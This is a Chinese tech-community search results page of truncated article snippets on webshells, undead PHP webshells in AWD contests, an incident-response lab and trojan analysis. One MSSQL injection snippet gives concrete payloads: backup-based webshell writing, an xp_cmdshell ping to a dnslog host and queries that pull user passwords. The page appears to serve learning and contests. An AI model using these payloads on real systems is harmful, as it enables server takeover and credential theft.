首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

干货 | WebShell基础详解

Webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种代码执行环境,也可以将其称做为一种网页后门。...黑客在入侵了一个网站后,通常会将asp或php后门文件与网站目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。...WebShell的分类 Webshell根据脚本可以分为PHP脚本木马ASP脚本木马,JSP脚本木马,也有基于.NET的脚本木马。...PHP内存马 PHP内存马,也叫做PHP不死马、不死僵尸,在线下AWD中是常用手段之一。在蚁剑中也有专门的插件可以一键注入内存马。...github.com/BeichenDream/Godzilla image-20211215212156298 C刀(Cknife) C刀是一款基于Java开发的完全基于配置文件的中国菜刀,跨平台,脚本类型支持ASP

9.5K32

经验分享 | mssql注入实战总结之狠快准绕

RECOVERY FULL-- ;create table 数据库名..表名(a image)-- //建表 ;insert into 数据库名..表名(a) values (0x一句话木马...)–- //插入一句话木马到表中,注意16进制 ;backup database 库名 to disk = ‘c:\shell.asp’ with differential , format ;...-- //进行差异备份 小结: 备份getshell这一般对php和asp有用,注意asp备份生成的文件经常有没有闭合的问题,但aspx我暂时没找到成功例子 我这是aspx的2种备份都试了,但因为备份后会插入多个...user_name()) --+ #查当前数据库用户,结果不是sa 1')/**/;/**/exec/**/master ..xp_cmdshell /**/ "ping xx.dnslog.cn" --+ #不死心...UserName from Users) -- 1' and 1=(select top 1 UserPwd from Users) -- 得到账号test,加密的密码,md5查不出,估计加盐了 不死心查第二个

1.6K10
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    应急靶场(12):【玄机】Linux入侵排查

    一、web目录存在木马,请找到木马的密码提交 猜测/var/www/html是web目录,进入后看到1.php这种正常网站不会命名的文件,查看后发现是webshell木马。...目前Linux没有好用的webshell木马查杀工具,此时可将web目录文件下载到Windows中,用D盾进行查杀。...flag{1} 二、服务器疑似存在不死马,请找到不死马的密码提交 在web目录/var/www/html中,看到.shell.php这种命名可疑的文件,查看后发现是不死马webshell。...5d41402abc4b2a76b9719d911017c592 flag{hello} 三、不死马是通过哪个文件生成的,请提交文件名 在web目录/var/www/html中,使用find命令查找存在...IP地址10.11.55.21的3333端口,判断是后门木马

    8710

    不死马的原理和利用

    何谓不死马,顾名思义就是不死不死马广泛应用与AWD中或者其他的维持权限的手法中,不死马简直就是一句话木马的升级版本,一句话木马不死马相比较起来,安全性做的很GOOD!!!...在以往的一句话木马中,密码简单方便呈现给了用户,如果在AWD中,知道了密码的话,就可以反手打一波其他的主机,因为如果是被批量种马的话,所有人都一样,这也就是"骑马",在很多场比赛中,我的队伍(自由公式)...都是利用一句话木马去反打其他的队伍一波 不死马原型 <?...,避免一些不必要的信息泄露出去,$file中可以规定你要不断生成的文件名,usleep(time)是生成木马的时间,这也是不死马的灵魂之一,通过不断生成文件在当前目录下,形成了不死马,不死马是一个进程,...$file后面的值设置成你要生成的文件名,连接也是用这个文件名字,就好像是.ZYGS.php 经过md5值的加密,以及不断生成木马文件,便成为了维持权限的好物,在bugku的AWD中,给种下不死马的话,

    5.2K00

    小记一个PHP不死

    如同字面意思一样,不死马怎么样都不会给"杀死"的木马,他是直接写入进程中,无限在指定目录下生成木马文件 上面就是典型的不死马,当然有几处是有些问题的 1.删除自身,也可以不删除,没什么区别 2.写入的一句话,这类一句话木马可能一下就能查出来,或者别人看到后知道你的php木马的密码是什么...,一般情况下也可以加混淆 3.usleep()也不一定需要,有的文件的宗旨在于卡目标机器,所以不断创建文件消耗对方服务器资源也是可以的 正常的PHP一句话木马为 两个条件同时满足,也就是Md5符合时,这个木马才会生效 杀死不死马的方法 首先 top|grep httpd来查看不死马的进程ID ?...> 因为不死马的特殊性,所以得条件竞争来删除,当然有的靶机处理比较卡,不需要条件竞争,手动直接kill 就好了 这里拿一辆"公交车"来试验一下,目标机器已经给我种马了,所以直接上传个不死马访问就好了

    3.3K20

    浅谈木马

    环境: 攻击者:kali 目标主机:Windows 一、了解木马 1.木马,又称为特洛伊木马 特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。...制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。...(2)服务器端 服务器端程序 服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。 二、制作简易木马 此处我们利用msfvenom制作木马程序。...三、木马的危害 由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。...木马捆绑: 制作自解压木马(准备一个木马、一个图片、一个压缩软件即可) 攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。

    27320

    Bugku-AWD初级起手式(公开)

    ,一些比赛环境中,出题方会在某个文件中放置木马所以就需要自己去下载整个网站,然后放到工具中去检查,如果有木马,删掉即可,然后反手利用一波,再写一个不死马维持权限,Nice!!!...,则应该立刻cd到木马所在的目录,将木马删除,出题方给的环境都是一样的,所以这个时候,又可以有任意一名队友去写脚本利用这个木马去拿分,能不能抓得到别的队伍全靠别的队伍有没有删除这个木马,尽量可以写一个不死马进去...,维持权限,后面就可以不断拿分了,当然,前提是别的队伍没有克制我方写入的不死马,当前期防御地差不多了,就可以把waf和文件监控给上了,为了防御 起手式③--攻击 工具:漏洞利用 通过起手式①和②已经知道已有的漏洞和...,给别的队伍写入了木马,那就可以骑马了,何谓骑马,就是利用别人写入的一句话木马,通过查看当前木马地路径和木马的密码,然后写一个脚本或者是一个个去利用,连接到别人同目录下的木马去获得flag得分,这就是骑马...但是如果写入的是不死马的话,一般都是有加密的,如果加密,那就很难利用了,加密的密文类型常见的md5,sha等等等等,不常见的字符一般是无法解出来的,要去破解,等破解地来,都比完了,所以骑马要骑有明文密码地马

    2.1K10

    木马盗号《一》

    这一节主要给大家分享的是黑客是如何利用木马进行盗号的。 久前看了一些安全方面的书籍。在看完了《计算机病毒揭秘与对抗》---王倍昌书 以后,打算找个目标试试手。...但是这样就不太真实,自己写的小程序显然没有防御措施,模拟不了真实环境,体会不到写盗号木马的乐趣-。-! 后面的实战环节就会碰到一些问题,后面我会说明。...由于本次只是木马主要功能原理介绍,所以我并不介绍木马怎么隐藏、怎么绕过360防御(本文木马很容易被杀毒软件查杀)进行免杀。(-。-/主要我还没看。O(∩_∩)O)。...对于本次盗号木马,我觉得通过病毒感染的插入方式进行代码运行比较好。当然也可以进行捆绑,可以另起一个DLL,或者服务等等。但是插入式首先目标定位精准,因为他只影响WeGame。...于是我打算从更底层的驱动级别模拟开始,但是这样木马隐蔽性就下降了很多了,因为我们必须加载驱动了,没办法只可以这样了。事实证明,这次是成功的O(∩_∩)O --------。

    1.5K30

    来自云端的木马:“百家”木马集团分析

    0×00背景 近日,腾讯反病毒实验室拦截到一批伪装成客户通知单的木马,该木马会根据自身文件名的不同而进行多种不同的恶意行为,经测试,目前国内的多款杀毒软件尚不能查杀该病毒,多个木马的变种MD5被多款安全软件加入到白名单中...该木马近期持续活跃,传播量上万,该木马有以下特点: 1)通过文件名控制自身行为,根据不同的文件名有着多达六十多种不同的行为。...3)篡改本地受信任数字证书列表,并构造证书给木马签名,逃避查杀。 ? 0×01木马文件概况 ?...,当然PlayLoad中还包含有少量的QQ粘虫木马(如ID 46),及其他游戏盗号木马。...0×03后记: 经过对木马加载器的详细分析和配置信息的猜测解读,做出如下图猜测,木马作者负责木马的免杀(同一个文件),并通过SQL Server上的配置信息来管理和销售木马,每卖出一个木马作者便为牧马人开立一个帐号

    1.4K70
    领券